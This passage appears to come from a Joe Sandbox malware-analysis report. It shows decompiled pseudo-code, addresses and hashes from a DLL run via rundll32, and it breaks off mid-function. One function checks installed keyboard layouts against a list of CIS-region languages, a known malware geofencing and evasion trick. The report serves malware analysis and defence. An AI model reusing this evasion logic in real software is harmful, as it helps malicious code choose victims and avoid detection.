                                                                                                                                                                                                                0x100033d0
                                                                                                                                                                                                                0x100033d6
                                                                                                                                                                                                                0x100033dc
                                                                                                                                                                                                                0x100033e2
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100033e8
                                                                                                                                                                                                                0x100033ea
                                                                                                                                                                                                                0x100033ea
                                                                                                                                                                                                                0x100033f3
                                                                                                                                                                                                                0x10003496
                                                                                                                                                                                                                0x10003496
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10003496
                                                                                                                                                                                                                0x100033f9
                                                                                                                                                                                                                0x100033ff
                                                                                                                                                                                                                0x1000340e
                                                                                                                                                                                                                0x10003419
                                                                                                                                                                                                                0x10003422
                                                                                                                                                                                                                0x10003427
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000342c
                                                                                                                                                                                                                0x1000342d
                                                                                                                                                                                                                0x10003431
                                                                                                                                                                                                                0x10003435
                                                                                                                                                                                                                0x10003438
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10003440
                                                                                                                                                                                                                0x10003440
                                                                                                                                                                                                                0x10003445
                                                                                                                                                                                                                0x1000346b
                                                                                                                                                                                                                0x10003470
                                                                                                                                                                                                                0x10003447
                                                                                                                                                                                                                0x10003450
                                                                                                                                                                                                                0x10003456
                                                                                                                                                                                                                0x1000345b
                                                                                                                                                                                                                0x1000345b
                                                                                                                                                                                                                0x10003473
                                                                                                                                                                                                                0x1000347b
                                                                                                                                                                                                                0x1000347f
                                                                                                                                                                                                                0x10003485
                                                                                                                                                                                                                0x1000348b
                                                                                                                                                                                                                0x1000348f
                                                                                                                                                                                                                0x10003491
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10003491
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10003499
                                                                                                                                                                                                                0x10003499
                                                                                                                                                                                                                0x1000349a
                                                                                                                                                                                                                0x1000349d
                                                                                                                                                                                                                0x1000349d
                                                                                                                                                                                                                0x100034ab
                                                                                                                                                                                                                0x100034ad
                                                                                                                                                                                                                0x100034ad
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100034ab

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000005A,?,00000004,?,00000000,00000001,?,?,10002821), ref: 10003450
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                • Opcode ID: 12f8d613c77fa2b6b561c5fc77a78a839f321e9505c0cf5ae6a38080ea26a529
                                                                                                                                                                                                                • Instruction ID: e917d9a377e98bf3d5a9616198259dbf32bf4c4c92623d05dc2f8582aaf3a776
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12f8d613c77fa2b6b561c5fc77a78a839f321e9505c0cf5ae6a38080ea26a529
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A315E716007109BF757CF55CD85B2BB7EAEB40384F65C82EE5429A25AC3B0F982CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E10002C5E() {
                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                				short _v14;
                                                                                                                                                                                                                				short _v16;
                                                                                                                                                                                                                				short _v18;
                                                                                                                                                                                                                				short _v20;
                                                                                                                                                                                                                				short _v22;
                                                                                                                                                                                                                				short _v24;
                                                                                                                                                                                                                				short _v26;
                                                                                                                                                                                                                				short _v28;
                                                                                                                                                                                                                				short _v30;
                                                                                                                                                                                                                				short _v32;
                                                                                                                                                                                                                				short _v34;
                                                                                                                                                                                                                				short _v36;
                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                				char _v56;
                                                                                                                                                                                                                				char _v312;
                                                                                                                                                                                                                				short _t31;
                                                                                                                                                                                                                				short _t32;
                                                                                                                                                                                                                				short _t33;
                                                                                                                                                                                                                				short _t34;
                                                                                                                                                                                                                				short _t35;
                                                                                                                                                                                                                				short _t36;
                                                                                                                                                                                                                				short _t37;
                                                                                                                                                                                                                				short _t38;
                                                                                                                                                                                                                				short _t39;
                                                                                                                                                                                                                				short _t40;
                                                                                                                                                                                                                				short _t41;
                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                				short _t54;
                                                                                                                                                                                                                				signed int _t57;
                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                				int _t60;
                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t31 = 0x19;
                                                                                                                                                                                                                				_v36 = _t31;
                                                                                                                                                                                                                				_t59 = 0;
                                                                                                                                                                                                                				_t32 = 0x23;
                                                                                                                                                                                                                				_v34 = _t32;
                                                                                                                                                                                                                				_t33 = 0x3f;
                                                                                                                                                                                                                				_v32 = _t33;
                                                                                                                                                                                                                				_t34 = 0x2c;
                                                                                                                                                                                                                				_v30 = _t34;
                                                                                                                                                                                                                				_t35 = 0x2b;
                                                                                                                                                                                                                				_v28 = _t35;
                                                                                                                                                                                                                				_t36 = 0x37;
                                                                                                                                                                                                                				_t54 = 0x40;
                                                                                                                                                                                                                				_v26 = _t36;
                                                                                                                                                                                                                				_t37 = 0x43;
                                                                                                                                                                                                                				_v22 = _t37;
                                                                                                                                                                                                                				_t38 = 0x28;
                                                                                                                                                                                                                				_v20 = _t38;
                                                                                                                                                                                                                				_t39 = 0x42;
                                                                                                                                                                                                                				_v18 = _t39;
                                                                                                                                                                                                                				_t40 = 0x22;
                                                                                                                                                                                                                				_v16 = _t40;
                                                                                                                                                                                                                				_t41 = 0x1a;
                                                                                                                                                                                                                				_v14 = _t41;
                                                                                                                                                                                                                				_t43 =  *0x10020d50; // 0x474fa80
                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                				_v24 = _t54;
                                                                                                                                                                                                                				_t44 =  *((intOrPtr*)(_t43 + 0x38))(_t54,  &_v312);
                                                                                                                                                                                                                				_t51 = 0;
                                                                                                                                                                                                                				_v44 = _t44;
                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                				if(_t44 != 0) {
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						_t57 = 0;
                                                                                                                                                                                                                						_t48 =  *(_t62 + _t51 * 4 - 0x134) & 0x3ff;
                                                                                                                                                                                                                						_v40 = _t48;
                                                                                                                                                                                                                						_t52 = _t48;
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							_t60 =  *(_t62 + _t57 * 2 - 0x20) & 0x0000ffff;
                                                                                                                                                                                                                							GetLocaleInfoA(3, _t60,  &_v56, 4);
                                                                                                                                                                                                                							if(_t52 != _t60) {
                                                                                                                                                                                                                								_t59 = _v8;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_t59 = 1;
                                                                                                                                                                                                                								_v8 = 1;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t57 = _t57 + 1;
                                                                                                                                                                                                                						} while (_t57 < 0xc);
                                                                                                                                                                                                                						_t51 = _v12 + 1;
                                                                                                                                                                                                                						_v12 = _t51;
                                                                                                                                                                                                                					} while (_t51 < _v44);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t59;
                                                                                                                                                                                                                			}










































                                                                                                                                                                                                                0x10002c6b
                                                                                                                                                                                                                0x10002c6e
                                                                                                                                                                                                                0x10002c72
                                                                                                                                                                                                                0x10002c74
                                                                                                                                                                                                                0x10002c77
                                                                                                                                                                                                                0x10002c7b
                                                                                                                                                                                                                0x10002c7e
                                                                                                                                                                                                                0x10002c82
                                                                                                                                                                                                                0x10002c85
                                                                                                                                                                                                                0x10002c89
                                                                                                                                                                                                                0x10002c8c
                                                                                                                                                                                                                0x10002c90
                                                                                                                                                                                                                0x10002c93
                                                                                                                                                                                                                0x10002c96
                                                                                                                                                                                                                0x10002c9a
                                                                                                                                                                                                                0x10002c9d
                                                                                                                                                                                                                0x10002ca1
                                                                                                                                                                                                                0x10002ca4
                                                                                                                                                                                                                0x10002ca8
                                                                                                                                                                                                                0x10002cab
                                                                                                                                                                                                                0x10002caf
                                                                                                                                                                                                                0x10002cb2
                                                                                                                                                                                                                0x10002cb6
                                                                                                                                                                                                                0x10002cb7
                                                                                                                                                                                                                0x10002cc2
                                                                                                                                                                                                                0x10002cc8
                                                                                                                                                                                                                0x10002ccb
                                                                                                                                                                                                                0x10002ccf
                                                                                                                                                                                                                0x10002cd2
                                                                                                                                                                                                                0x10002cd4
                                                                                                                                                                                                                0x10002cd7
                                                                                                                                                                                                                0x10002cdc
                                                                                                                                                                                                                0x10002cdf
                                                                                                                                                                                                                0x10002cef
                                                                                                                                                                                                                0x10002cf1
                                                                                                                                                                                                                0x10002cf4
                                                                                                                                                                                                                0x10002cf7
                                                                                                                                                                                                                0x10002cf9
                                                                                                                                                                                                                0x10002cf9
                                                                                                                                                                                                                0x10002d07
                                                                                                                                                                                                                0x10002d10
                                                                                                                                                                                                                0x10002d1a
                                                                                                                                                                                                                0x10002d12
                                                                                                                                                                                                                0x10002d14
                                                                                                                                                                                                                0x10002d15
                                                                                                                                                                                                                0x10002d15
                                                                                                                                                                                                                0x10002d1d
                                                                                                                                                                                                                0x10002d1e
                                                                                                                                                                                                                0x10002d26
                                                                                                                                                                                                                0x10002d27
                                                                                                                                                                                                                0x10002d2a
                                                                                                                                                                                                                0x10002d2f
                                                                                                                                                                                                                0x10002d35

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000003,?,?,00000004,00000000), ref: 10002D07
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                • Opcode ID: a1b938862a9920fdab6539c62caee96879eb47422c256fb5aa8c4470ff4a9cdd
                                                                                                                                                                                                                • Instruction ID: 918cc5d447bd8afb92986e08f6f4ef1d20a23fc78e2c3519b4597a407533d554
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1b938862a9920fdab6539c62caee96879eb47422c256fb5aa8c4470ff4a9cdd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB218276E54319AAFB00DFD5A891BFEB7B4EF48750F20141BEA04EB190D2B10E41C795
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E10012137(void* __eflags) {
                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                                				intOrPtr* _t19;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t19 = E10013A5B(0x14);
                                                                                                                                                                                                                				if(_t19 != 0) {
                                                                                                                                                                                                                					 *(_t19 + 0xc) =  *(_t19 + 0xc) & 0x00000000;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t19 + 8)) = 8;
                                                                                                                                                                                                                					 *_t19 = 1;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t19 + 4)) = 1;
                                                                                                                                                                                                                					_t10 = E10013A5B(0x20);
                                                                                                                                                                                                                					 *((intOrPtr*)(_t19 + 0x10)) = _t10;
                                                                                                                                                                                                                					if(_t10 != 0) {
                                                                                                                                                                                                                						return _t19;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					E10013A49(_t10, _t19);
                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				GetLocaleInfoA(0x100, 0x200,  &_v16, 4);
                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                			}






                                                                                                                                                                                                                0x10012145
                                                                                                                                                                                                                0x1001214a
                                                                                                                                                                                                                0x10012166
                                                                                                                                                                                                                0x1001216d
                                                                                                                                                                                                                0x10012174
                                                                                                                                                                                                                0x10012178
                                                                                                                                                                                                                0x1001217b
                                                                                                                                                                                                                0x10012180
                                                                                                                                                                                                                0x10012186
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10012191
                                                                                                                                                                                                                0x10012189
                                                                                                                                                                                                                0x10012162
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10012162
                                                                                                                                                                                                                0x1001215c
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000100,00000200,00000004,00000004,00000000), ref: 1001215C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                • Opcode ID: 7b1663db65b7fe56265af7ae9b1752d128a7e18b015dc0efa9ad134005c2b56c
                                                                                                                                                                                                                • Instruction ID: 99f10fc073ecf109e24ac13ca0acd49dcb2bbe1fdf15cb55e50fbcb3f53cae0e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b1663db65b7fe56265af7ae9b1752d128a7e18b015dc0efa9ad134005c2b56c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F0B4B1A40712AEE720DB709C06B4B77D4DF10B55F10C429EAD5DE1C1E7B0D4844791
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E1000FFF2(void* __ecx, void* __edx) {
                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                				short _t8;
                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t17 = __edx;
                                                                                                                                                                                                                				_t9 = __ecx;
                                                                                                                                                                                                                				_t4 = E1000D389(__edx);
                                                                                                                                                                                                                				GetLocaleInfoA(0x32, 9,  &_v16, 4);
                                                                                                                                                                                                                				_t2 = _t9 + 0x400; // 0x400
                                                                                                                                                                                                                				E100119CD(_t17, _t4, _t19, _t2);
                                                                                                                                                                                                                				_t8 = 0x14;
                                                                                                                                                                                                                				 *((short*)(_t9 + 0x420)) = _t8;
                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                			}









                                                                                                                                                                                                                0x1000fffb
                                                                                                                                                                                                                0x1000fffd
                                                                                                                                                                                                                0x10010000
                                                                                                                                                                                                                0x10010012
                                                                                                                                                                                                                0x10010018
                                                                                                                                                                                                                0x10010023
                                                                                                                                                                                                                0x1001002b
                                                                                                                                                                                                                0x1001002e
                                                                                                                                                                                                                0x10010037

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000032,00000009,10002D8F,00000004,00000000,00000000,00000424,10002D8F,00000000), ref: 10010012
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                • Opcode ID: 3b7f269050b1f35a73f0b8165a53a42d9c1832364f09677761d1ca134793b5f9
                                                                                                                                                                                                                • Instruction ID: 1892679a08907ef3746c90150a7bae5dd7f49ea90dce8a51ef2b7239b0e12dfa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b7f269050b1f35a73f0b8165a53a42d9c1832364f09677761d1ca134793b5f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCE092763402043AE704A699A886FBB379CDB84664F14012AFB09DF1C2E9F06C4182B5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E1000AFB9(void* __ecx) {
                                                                                                                                                                                                                				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				if(__ecx == 0) {
                                                                                                                                                                                                                					GetSystemInfo( &_v40);
                                                                                                                                                                                                                					return _v40.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t5 = 9;
                                                                                                                                                                                                                					return _t5;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}





                                                                                                                                                                                                                0x1000afc1
                                                                                                                                                                                                                0x1000afcc
                                                                                                                                                                                                                0x1000afd7
                                                                                                                                                                                                                0x1000afc3
                                                                                                                                                                                                                0x1000afc5
                                                                                                                                                                                                                0x1000afc7
                                                                                                                                                                                                                0x1000afc7

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,1000B44C,?,?,00000001), ref: 1000AFCC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                                • Opcode ID: e98dc7e497c2cb20d98128c2fd06c0b19b016171e807c51aea00fd95ed56fdf7
                                                                                                                                                                                                                • Instruction ID: 22c7fc0e0940038590920ac71496bdb1d1527b7a0f48138a502887aeb48b8403
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e98dc7e497c2cb20d98128c2fd06c0b19b016171e807c51aea00fd95ed56fdf7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EC0226160020E46DF0097A266066BA72EC4B08289F100062EC03F00C0E560DC8042A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 99%
                                                                                                                                                                                                                			E100194D0(intOrPtr _a4, signed int _a8, signed int _a12) {
                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                				signed short* _v12;
                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                				signed short _v20;
                                                                                                                                                                                                                				unsigned int _v24;
                                                                                                                                                                                                                				signed short _v28;
                                                                                                                                                                                                                				signed int _t223;
                                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                                				signed int _t237;
                                                                                                                                                                                                                				signed short _t240;
                                                                                                                                                                                                                				signed int _t241;
                                                                                                                                                                                                                				signed short _t244;
                                                                                                                                                                                                                				signed int _t245;
                                                                                                                                                                                                                				signed short _t248;
                                                                                                                                                                                                                				signed int _t249;
                                                                                                                                                                                                                				signed int _t250;
                                                                                                                                                                                                                				void* _t254;
                                                                                                                                                                                                                				signed char _t259;
                                                                                                                                                                                                                				signed int _t275;
                                                                                                                                                                                                                				signed int _t289;
                                                                                                                                                                                                                				signed int _t308;
                                                                                                                                                                                                                				signed short _t316;
                                                                                                                                                                                                                				signed int _t321;
                                                                                                                                                                                                                				void* _t329;
                                                                                                                                                                                                                				signed short _t330;
                                                                                                                                                                                                                				signed short _t333;
                                                                                                                                                                                                                				signed short _t334;
                                                                                                                                                                                                                				signed short _t343;
                                                                                                                                                                                                                				signed short _t346;
                                                                                                                                                                                                                				signed short _t347;
                                                                                                                                                                                                                				signed short _t348;
                                                                                                                                                                                                                				signed short _t358;
                                                                                                                                                                                                                				signed short _t361;
                                                                                                                                                                                                                				signed short _t362;
                                                                                                                                                                                                                				signed short _t363;
                                                                                                                                                                                                                				signed short _t370;
                                                                                                                                                                                                                				signed int _t373;
                                                                                                                                                                                                                				signed int _t378;
                                                                                                                                                                                                                				signed short _t379;
                                                                                                                                                                                                                				signed short _t382;
                                                                                                                                                                                                                				unsigned int _t388;
                                                                                                                                                                                                                				unsigned short _t390;
                                                                                                                                                                                                                				unsigned short _t392;
                                                                                                                                                                                                                				unsigned short _t394;
                                                                                                                                                                                                                				signed int _t396;
                                                                                                                                                                                                                				signed int _t397;
                                                                                                                                                                                                                				signed int _t398;
                                                                                                                                                                                                                				signed int _t400;
                                                                                                                                                                                                                				signed short _t401;
                                                                                                                                                                                                                				signed int _t402;
                                                                                                                                                                                                                				signed int _t403;
                                                                                                                                                                                                                				signed int _t407;
                                                                                                                                                                                                                				signed int _t409;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t223 = _a8;
                                                                                                                                                                                                                				_t235 =  *(_t223 + 2) & 0x0000ffff;
                                                                                                                                                                                                                				_push(_t397);
                                                                                                                                                                                                                				_t388 = 0;
                                                                                                                                                                                                                				_t398 = _t397 | 0xffffffff;
                                                                                                                                                                                                                				if(_a12 < 0) {
                                                                                                                                                                                                                					L42:
                                                                                                                                                                                                                					return _t223;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t329 =  !=  ? 7 : 0x8a;
                                                                                                                                                                                                                					_v12 = _t223 + 6;
                                                                                                                                                                                                                					_t254 = (0 | _t235 != 0x00000000) + 3;
                                                                                                                                                                                                                					_v16 = _a12 + 1;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						_v24 = _t388;
                                                                                                                                                                                                                						_t388 = _t388 + 1;
                                                                                                                                                                                                                						_a8 = _t235;
                                                                                                                                                                                                                						_a12 = _t235;
                                                                                                                                                                                                                						_v8 =  *_v12 & 0x0000ffff;
                                                                                                                                                                                                                						_t223 = _a4;
                                                                                                                                                                                                                						if(_t388 >= _t329) {
                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                							if(_t388 >= _t254) {
                                                                                                                                                                                                                								if(_a8 == 0) {
                                                                                                                                                                                                                									_t122 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                									_t400 =  *_t122;
                                                                                                                                                                                                                									if(_t388 > 0xa) {
                                                                                                                                                                                                                										_t168 = _t223 + 0xac4; // 0x159850f
                                                                                                                                                                                                                										_t330 =  *_t168 & 0x0000ffff;
                                                                                                                                                                                                                										_t169 = _t223 + 0xac6; // 0x159
                                                                                                                                                                                                                										_t237 =  *_t169 & 0x0000ffff;
                                                                                                                                                                                                                										_v24 = _t330;
                                                                                                                                                                                                                										_t171 = _t223 + 0x16b8; // 0xff4d88c8
                                                                                                                                                                                                                										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                                                                                                                                                                                                                										_v28 = _t333;
                                                                                                                                                                                                                										if(_t400 <= 0x10 - _t237) {
                                                                                                                                                                                                                											_t259 = _t400 + _t237;
                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                											_t173 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t333;
                                                                                                                                                                                                                											_t175 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                											 *((char*)( *_t175 +  *_t173)) = _v28;
                                                                                                                                                                                                                											_t223 = _a4;
                                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                											_t181 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                											_t182 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                											_t183 = _t223 + 0x16b9; // 0xfff4d88
                                                                                                                                                                                                                											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                											_t333 = _v24 >> 0x10;
                                                                                                                                                                                                                											_t189 = _t223 + 0x16bc; // 0x8ac9b60f
                                                                                                                                                                                                                											_t259 =  *_t189 + 0xfffffff0 + _t237;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_t334 = _t333 & 0x0000ffff;
                                                                                                                                                                                                                										 *(_t223 + 0x16bc) = _t259;
                                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t334;
                                                                                                                                                                                                                										_t401 = _t334 & 0x0000ffff;
                                                                                                                                                                                                                										if(_t259 <= 9) {
                                                                                                                                                                                                                											_t209 = _t388 - 0xb; // -10
                                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                                                                                                                                                                                                                											 *(_t223 + 0x16bc) = _t259 + 7;
                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                											_t193 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                                											_t390 = _t388 + 0xfffffff5;
                                                                                                                                                                                                                											_t194 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                											_t240 = _t390 << _t259 | _t401;
                                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t240;
                                                                                                                                                                                                                											 *( *_t193 +  *_t194) = _t240;
                                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                                											_t199 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                                											_t200 = _t223 + 8; // 0x8d000040
